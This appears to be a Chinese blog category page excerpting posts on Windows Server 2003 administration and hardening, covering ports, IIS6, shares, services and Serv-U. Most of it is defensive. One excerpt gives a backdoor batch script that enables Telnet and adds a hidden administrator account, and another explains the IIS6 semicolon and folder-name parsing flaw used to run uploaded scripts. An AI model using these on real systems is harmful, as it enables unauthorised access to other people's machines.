Windows Server 2003 R2
文章平均质量分 57
oBuDaoWeng
这个作者很懒,什么都没留下…
展开
-
关机清理虚拟内存
如果电脑的内存太小,会直接影响到系统效率,这时就得使用虚拟内存。虚拟内存就是将硬盘虚拟成为内存,生成一个用作缓存的页面文件。但是每次关机时,这个虚拟内存在默认的设置中,并不会释放它所记忆的数据,在下次开机时就会影响到开机时间。 因此我们可以将虚拟内存在每次关机时,就将其中的数据清除。在运行中输入“regedit”开启注册表编辑器,打开“HKEY_LOCAL_MACHINE\SYSTE原创 2013-02-27 20:46:57 · 2963 阅读 · 0 评论 -
TRACERT命令
Tracert(跟踪路由)是路由跟踪实用程序,用于确定 IP 数据包访问目标所采取的路径。Tracert 命令用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机的路由.其命令格式如下: tracert [-d] [-h maximum_hops] [-j computer-list] [-w timeout] target_name编辑转载 2012-12-29 14:37:59 · 717 阅读 · 0 评论 -
ccproxy的缺省代理端口列表
HTTP: 808 - 用于浏览器上网FTP (Web): 808 -用于浏览器连接FTP站点FTP: 2121-用于FTP客户端软件连接FTP站点(如CuteFTP)Gopher: 808-用于浏览器连接Gopher站点Secure/SSL/HTTPS: 808 -用于浏览器连接安全站点RTSP: 808-用于Real PlayerSOCKS: 1080-用于部分网络客户原创 2012-12-16 20:12:25 · 1616 阅读 · 0 评论 -
显示本机DNS缓存
ipconfig /displaydns 记录名称. . . . . . . : blog.csdn.net 记录类型. . . . . . . : 1 生存时间. . . . . . . : 472 数据长度. . . . . . . : 4 部分. . . . . . . . . : 答案 A (主机)记录 . . . . :原创 2012-12-28 20:15:16 · 1941 阅读 · 0 评论 -
清除本机DNS缓存
ipconfig /flushdns C:\Users\Administrator>ipconfig /flushdnsWindows IP 配置已成功刷新 DNS 解析缓存。C:\Users\Administrator> C:\Users\Administrator>ipconfig /displaydnsWindows IP 配置无法显示 DNS 解析原创 2012-12-28 20:17:49 · 1212 阅读 · 0 评论 -
端口大全及端口关闭方法(详细).txt
一 、端口大全 端口:0 服务:Reserved 说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。端口:1 服务:tcpmux 说明:这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,原创 2012-12-12 21:27:10 · 880 阅读 · 0 评论 -
利用“TCP/IP筛选”功能限制服务器的端口
对于个人用户来说,您可以限制所有的端口,因为您根本不必让您的机器对外提供任何服务;而对于对外提供网络服务的服务器,我们需把必须利用的端口(比如WWW端口80、FTP端口21、邮件服务端口25、110等)开放,其他的端口则全部关闭。 这里,对于采用Windows 2000或者Windows XP的用户来说,不需要安装任何其他软件,可以利用“TCP/IP筛选”功能限制服务器的端口。具体设原创 2012-12-12 21:23:47 · 1934 阅读 · 0 评论 -
serv-u防本地提权
现在很多木马脚本都有一个使用serv-u的LocalAdministrator帐号来提权的功能。看了一些资料,说是要通过ultraedit来修改该帐号和密码,来防提权。可是今天试着在serv-u上设置了管理员密码后,提权功能就失效了。这里的管理员密码是对应着LocalAdministrator帐号的密码吗?大家来交流serv-u的安全防范问题吧! 1.设置好转载 2012-12-11 21:59:20 · 737 阅读 · 0 评论 -
免杀XP后门(适合菜鸟电脑)
xpbackdoor.bat内容如下sc config tlntsvr start= autonet start tlntsvrnet user myishacker 12345678 /addnet localgroup administrators myishacker /addreg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W原创 2012-12-22 22:21:37 · 894 阅读 · 0 评论 -
regedit.exe的命令行使用
Regedit.exe 虽是 GUI (Windows 图形界面下)下使用的程序,但其实是有未公开的参数的,可以在CMD 或 DOS 下使用。当然,在 Windows XP 等操作系统下,我们用到的更多的是/S 参数。1,Reregit filename1有关命令行参数的含义为:filename1 指定引入注册表数据库的文件名。 直接导转载 2012-12-22 21:55:15 · 3157 阅读 · 1 评论 -
windows 2003最完善最完美的权限及安全设置解决方案
一、服务器安全设置 1. IIS6.0的安装和设置 1.1 开始菜单—>控制面板—>添加或删除程序—>添加/删除Windows组件 应用程序 ———ASP.NET(可选) |——启用网络 COM+ 访问(必选) |——Internet 信息服务(IIS)———Internet 信息服务管理器(必选) |——公转载 2012-12-29 14:32:59 · 13860 阅读 · 0 评论 -
windows2003 IIS6.0的设置的几点经验
一、系统设置1、启用asp支持windows Server 2003 默认安装,是不安装 IIS6的,需要另外安装。安装完 IIS6,还需要单独开启对于 asp 的支持。第一步,启用asp,进入:控制面板 -> 管理工具 ->IIS(Internet 服务器)- Web服务扩展 -> Active Server Pages -> 允许,在服务端的包含文件 -> 允许第二步,转载 2012-12-19 22:15:45 · 562 阅读 · 0 评论 -
Windows Server2003 IIS 6.0 安全配置
Windows Server2003 IIS 6.0安全配置草 稿目 录1. 安装IIS6.0.21.1 安装Internet 信息服务...21.2 配置匿名身份验证...22. 基本 Web站点配置...33. 让IIS以最小的NTFS权限运行...34.转载 2012-12-21 20:05:57 · 2447 阅读 · 0 评论 -
Windows 2003 IIS6 存在着文件解析路径的漏洞
原理就是1.只要一个文件有(.asp)后面再带上分号(;)后面再带上一个随意字符加上扩展名如(cao.asp;ca.jpg)这个文件Windows会当成jpg图像文件,但是这种文件在IIS中会被当成asp运行. 比如 cao.asp;ca.jpg2. Windows 2003 IIS6 存在着文件解析路径的漏洞,当文件夹名为类似**.asp结尾的目录名的时候(即文件夹名看起来像一个原创 2012-12-21 15:44:09 · 4375 阅读 · 0 评论 -
IIS权限设置与应用
首先,我们需要用到以下的组:IIS_WPG 组(也称为 IIS 工作进程组,IIS Worker Process Group)Guests组 (来宾组,在系统中拥有最少的权限)以及以下的帐号:Internet 来宾帐户 (匿名访问 Internet 信息服务的内置帐户)启动 IIS 进程帐户 (用于启动进程外应用程序的 Internet 信息服务的内置帐户)然后我们转载 2012-12-21 20:21:34 · 1113 阅读 · 0 评论 -
高危IIS6.0文件名解析漏洞终极解决办法
www.2cto.com:这篇文章设计方法应该是早就出来了,内容涉及引用,请大家参考我之前就发现这个漏洞,我也无奈,后来我想到了rewrite这个东西,它可以用正则表达式匹配URL进行处理。 http://www.2cto.com /dir.asp/diy.jpg 比如这就是个diy.asp被更改成图片的文件 IIS6.0的漏洞可以运行它。 我的解决办法:转载 2012-12-21 16:14:04 · 2683 阅读 · 0 评论 -
Windows 控制台注册表工具 Reg
C:\Documents and Settings\Administrator>regWindows 控制台注册表工具 - 版本 3.0版权所有 (C) Microsoft Corp. 1981-2001. 保留所有权利。REG Operation [参数列表] Operation [ QUERY | ADD | DELETE | COPY |转载 2012-12-22 21:54:16 · 1153 阅读 · 0 评论 -
Windows XP中如何实现在登录界面上不显示过多用户名
适用范围:Windows XP默认情况下,Windows XP会在登录界面中显示已经建立的用户账户名称。HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList为每一个希望被隐藏的用户新建一个"DWORD值",键名就是要被隐藏的用户名,将这些转载 2012-12-22 21:30:24 · 2584 阅读 · 0 评论 -
Windows 2003 IIS服务常见故障排查全攻略
Windows 2003 IIS 常见故障排查与解决方法一、64位windows 2003 上无法运行access数据库asp链接access数据库出错,提示驱动未找到这是64位windows上的经典问题,将iis切换到32位兼容模式即可解决方法:1打开命令提示符窗口,然后运行以下命令:cscript c:\inetpub\AdminScripts\adsutil.vb原创 2012-12-19 23:18:33 · 2399 阅读 · 0 评论 -
RegSvr32
百科名片 Regsvr32Regsvr32命令的作用是将动态链接库文件注册为注册表中的命令组成。WInXP系统的regsvr32.exe在windows\system32文件夹下;2000系统的regsvr32.exe在winnt\system32文件夹下。目录语法参数执行该命令的方法实现组件注册主要功能一、轻松修复原创 2012-12-19 22:52:21 · 1547 阅读 · 0 评论 -
cacls
C:\>cacls显示或者修改文件的访问控制列表(ACL)CACLS filename [/T] [/M] [/S[:SDDL]] [/E] [/C] [/G user:perm] [/R user [...]] [/P user:perm [...]] [/D user [...]] filename Displays ACLs.原创 2012-12-19 22:48:45 · 868 阅读 · 0 评论 -
IIS服务的命令行方式重启命令
iisreset /RESTART 停止后启动iisreset /START 启动IIS (如果停止) iisreset /STOP 停止IIS (如果启动)iisreset /REBOOT 重启电脑 iisreset /REBOOTonERROR 如果停止IIS失败重启电脑 iisreset /NOFORCE 不用强迫IIS停止 iisreset原创 2012-12-22 19:29:49 · 1153 阅读 · 0 评论 -
管理员应该如何加固Web服务器
微软的IIS打造一个WEB服务器是件非常简单的事情,但是它 的安全性实在不敢恭维。攻击者通过注入、上传、旁注等技术获得了某个网站的 Webshell,然后进一步渗透提权,直至控制整个Web服务器。至于如何让攻击者无缘Webshell那是代码部分的问题,我 们做为管理员应该如何加 固Web服务器,让攻击者在获得了 Webshell之后无功而返呢? 一、设置命令权限 默认设置下,web转载 2012-12-21 20:29:47 · 1273 阅读 · 0 评论 -
IIS6.0安全设置
初次安装 IIS 6.0 时,Web 服务器仅服务于或显示静态网页 (HTML),这降低了服务于动态网页或可执行文件、内容而带来的风险。默认情况下禁用 ASP 和 ASP.NET。由于 IIS 6.0 的默认设置禁用了 Web 服务通常使用的许多功能,所以,如何在降低服务器暴露给潜在攻击者的程度,同时配置 Web 服务器的其他功能呢? 一、减少 Web 服务器的攻击面,通过减少 We转载 2012-12-21 20:15:05 · 969 阅读 · 0 评论 -
sc.exe 命令行管理系统服务工具
sc.exe常用功能列表:1.更改服务的启动状态(这是比较有用的一个功能) 2.删除服务(除非对自己电脑的软、硬件所需的服务比较清楚,否则不建议删除任何系统服务,特别是基础服务) 3.停止或启动服务(功能上类似于net stop/start,但速度更快且能停止的服务更多)sc.exe的命令格式如下: 修改服务启动类型的命令行格式为(特别注意start=后面有一个空格)转载 2012-12-05 21:32:27 · 1155 阅读 · 0 评论 -
启动服务.bat
sc start Alertersc config Alerter start= autosc start algsc config alg start= autosc start browsersc config browser start= autosc start ersvcsc config ersvc start= autosc start helps原创 2012-12-05 22:03:50 · 1552 阅读 · 0 评论 -
windows 2003 server R2中 TCP/IP筛选
对于个人用户来说,您可以限制所有的端口,因为您根本不必让您的机器对外提供任何服务如果要阻止所有TCP 流量,请单击仅允许,但不要在TCP 端口列中添加任何端口号。 “TCP/IP 筛选”只能筛选入站流量。此功能不影响出站流量,也不影响为接受来自出站请求的响应而创建的响应端口。原创 2012-12-06 10:46:34 · 1530 阅读 · 0 评论 -
Windows Server 2003 R2 系统服务
下面是一些大略的介绍: 1:Alerter 服务方向: 负责向用户通报管理警报,该服务和Mesenger服务一起工作,后者接收并路由前者的信息. 可执行文件: %systemRoot%\system32\services.exe 风险: 潜在可能导致社会工程攻击 建议: 将Alerter服务发出的警告限定为只由管理员接收. 2:Application Managemen转载 2012-12-06 10:18:42 · 1897 阅读 · 0 评论 -
Windows Server 2003 R2 删除 Microsoft 网络的文件和打印机共享
原创 2012-12-05 23:02:09 · 2106 阅读 · 0 评论 -
删除默认共享.bat
net share C$ /del net share D$ /del net share E$ /del net share F$ /del net share admin$ /del 运行中输入gpedit.msc, 回车即可打开组策略编辑器。点击用户配置→Windows设置→脚本(登录/注销)→登录 在出现的“登录 属性”窗口中单击原创 2012-12-05 22:37:54 · 850 阅读 · 0 评论 -
Windows Server 2003
Windows Server 2003 百科名片 Windows Server 2003是微软的服务器操作系统。最初叫作“Windows .NET Server”,后改成“Windows .NET Server 2003”,最终被改成“Windows Server 2003”,于2003年3月28日发布,并在同年四月底上市。相对于Windows 2000转载 2012-12-04 20:36:32 · 1225 阅读 · 0 评论 -
WinServer 2003 R2关键性技术揭密
微软日前表示,Windows Server 2003 R2是Windows Server 2003系列的最新版本,在分公司服务器管理、跨组织的身份认证、以及网络储存管理等三个领域进行了强化,并增加了许多新功能。 下一代Windows服务器“Longhorn”前的重要版本 依据 Windows Server 产品上市时间的规划,Windows Server 2003 R2是推进到转载 2012-12-04 20:42:56 · 508 阅读 · 0 评论 -
Windows Server 2003 R2 删除默认共享
1、删除所有共享 设置更改为:原创 2012-12-04 21:54:26 · 1069 阅读 · 0 评论 -
停止服务.bat
sc stop Alertersc config Alerter start= demandsc stop algsc config alg start= demandsc stop browsersc config browser start= demandsc stop ersvcsc config ersvc start= demandsc stop he原创 2012-12-05 22:04:27 · 2901 阅读 · 0 评论 -
更改FTP登录密码
C:\Documents and Settings\Administrator>ftp 10.100.13.145Connected to 10.100.13.145.220 Serv-U FTP Server v14.0 ready...User (10.100.13.145:(none)): whp331 User name okay, need password.Pass原创 2012-12-08 15:45:14 · 788 阅读 · 0 评论 -
windows 2003 server R2 终端服务3389端口更改方法
1. 服务器端的修改 将下列两个注册表键中的 PortNumber 均改成自定义的端口即可(修改时选择十进制): HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Terminal Server/Wds/Repwd/Tds/Tcp (本人注:经过试验,这条可以不用修改,主要是下面的) HKEY_LOCA原创 2012-12-07 16:07:01 · 1824 阅读 · 0 评论 -
组策略命令大全
gpedit.msc组策略命令功能:用来管理Windows系统里面的用户配置,如果域管理组策略可以通过他管理整个域的所有电脑登录用户配置命令位置: C:\WINDOWS\system32 或者 C:\WINNT\system32如何打开组策略编辑器?答:运行里输入gpedit.msc系统里提示没有打开组策略这条命令?答:1:看是不是注册表中锁住了组策略“HKEY_CURRE转载 2012-12-08 10:26:59 · 4563 阅读 · 0 评论 -
组策略
百科名片组策略(Group Policy)是管理员为用户和计算机定义并控制程序、网络资源及操作系统行为的主要工具。通过使用组策略可以设置各种软件、计算机和用户策略。目录启动方式基本概况主要版本运行方式一般运行MMC管理单元软件限制策略安全使用全攻略一、 系统设置安全篇1. 禁止运行指定程序2. 锁定注册表编转载 2012-12-08 10:17:41 · 962 阅读 · 0 评论 -
windows 2003 server R2中 mstsc使用
Mstsc (Microsoft terminal services client) 创建与终端服务器或其他远程计算机的连接,编辑现有“远程桌面连接(.rdp)”配置文件,并将 Windows XP 连接(使用“客户端国防部设备 接管理器”创建的连接)迁移到新的 .rdp 文件中。 Mstsc还有一种说法,Microsoft Telnet Screen Control ,即“微转载 2012-12-07 16:09:53 · 1115 阅读 · 0 评论 -
FTP的特殊性
大多数的TCP服务是使用单个的连接,一般是客户向服务器的一个周知端口发起连接,然后使用这个连接进行通讯。但是,FTP协议却有所不同,它使用双向的多个连接,而且使用的端口很难预计。一般,FTP连接包括:一个控制连接(control connection)这个连接用于传递客户端的命令和服务器端对命令的响应。它使用服务器的21端口,生存期是整个FTP会话时间。几个数据连接(data转载 2012-12-06 21:59:29 · 1372 阅读 · 0 评论